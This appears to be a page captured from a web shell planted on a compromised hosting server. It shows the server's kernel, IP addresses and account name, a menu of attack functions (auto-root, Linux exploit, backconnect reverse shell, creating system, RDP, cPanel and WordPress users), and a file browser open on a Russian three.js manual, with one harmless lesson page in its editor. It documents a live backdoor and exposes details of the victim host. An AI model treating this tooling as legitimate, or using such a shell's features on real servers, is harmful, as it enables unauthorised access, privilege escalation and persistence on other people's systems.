Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 52.14.193.97
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
HRD-Test /
manual /
ru /
[ HOME SHELL ]
Name
Size
Permission
Action
align-html-elements-to-3d.html
1.78
KB
-rw-r--r--
backgrounds.html
1.75
KB
-rw-r--r--
billboards.html
1.71
KB
-rw-r--r--
cameras.html
38.51
KB
-rw-r--r--
canvas-textures.html
1.73
KB
-rw-r--r--
cleanup.html
1.7
KB
-rw-r--r--
custom-buffergeometry.html
29.49
KB
-rw-r--r--
debugging-glsl.html
10.31
KB
-rw-r--r--
debugging-javascript.html
39.75
KB
-rw-r--r--
fog.html
18.11
KB
-rw-r--r--
fundamentals.html
23.47
KB
-rw-r--r--
game.html
1.71
KB
-rw-r--r--
indexed-textures.html
1.8
KB
-rw-r--r--
lights.html
34.98
KB
-rw-r--r--
load-gltf.html
1.74
KB
-rw-r--r--
load-obj.html
1.73
KB
-rw-r--r--
material-table.html
2.03
KB
-rw-r--r--
materials.html
25.01
KB
-rw-r--r--
multiple-scenes.html
28.25
KB
-rw-r--r--
offscreencanvas.html
54.49
KB
-rw-r--r--
optimize-lots-of-objects-anima...
28.96
KB
-rw-r--r--
optimize-lots-of-objects.html
31.13
KB
-rw-r--r--
picking.html
1.7
KB
-rw-r--r--
post-processing-3dlut.html
1.75
KB
-rw-r--r--
post-processing.html
1.73
KB
-rw-r--r--
prerequisites.html
24.53
KB
-rw-r--r--
primitives.html
26.25
KB
-rw-r--r--
rendering-on-demand.html
15.56
KB
-rw-r--r--
rendertargets.html
9.88
KB
-rw-r--r--
responsive.html
21.64
KB
-rw-r--r--
scenegraph.html
30.74
KB
-rw-r--r--
setup.html
5.93
KB
-rw-r--r--
shadertoy.html
1.74
KB
-rw-r--r--
shadows.html
35.98
KB
-rw-r--r--
textures.html
42.3
KB
-rw-r--r--
tips.html
20.57
KB
-rw-r--r--
transparency.html
1.72
KB
-rw-r--r--
voxel-geometry.html
1.77
KB
-rw-r--r--
webxr-basics.html
1.68
KB
-rw-r--r--
webxr-look-to-select.html
1.75
KB
-rw-r--r--
webxr-point-to-select.html
1.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : material-table.html
<!DOCTYPE html><html lang="ru"><head> <meta charset="utf-8"> <title>Таблица характеристик материалов</title> <meta name="viewport" content="width=device-width, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:site" content="@threejs"> <meta name="twitter:title" content="Three.js – Таблица характеристик материалов"> <meta property="og:image" content="https://threejs.org/files/share.png"> <link rel="shortcut icon" href="../../files/favicon_white.ico" media="(prefers-color-scheme: dark)"> <link rel="shortcut icon" href="../../files/favicon.ico" media="(prefers-color-scheme: light)"> <link rel="stylesheet" href="../resources/lesson.css"> <link rel="stylesheet" href="../resources/lang.css"> <!-- Import maps polyfill --> <!-- Remove this when import maps will be widely supported --> <script async src="https://unpkg.com/es-module-shims@1.8.0/dist/es-module-shims.js"></script> <script type="importmap"> { "imports": { "three": "../../build/three.module.js" } } </script> </head> <body> <div class="container"> <div class="lesson-title"> <h1>Таблица характеристик материалов</h1> </div> <div class="lesson"> <div class="lesson-main"> <p>Наиболее распространенными материалами в three.js являются материалы Mesh. Вот таблица, показывающая, какие функции поддерживают каждый из материалов.</p> <div> <div id="material-table" class="threejs_center"></div> <script type="module" src="../resources/threejs-material-table.js"></script> <link rel="stylesheet" href="../resources/threejs-material-table.css"> </div> </div> </div> </div> <script src="../resources/prettify.js"></script> <script src="../resources/lesson.js"></script> </body></html>
Close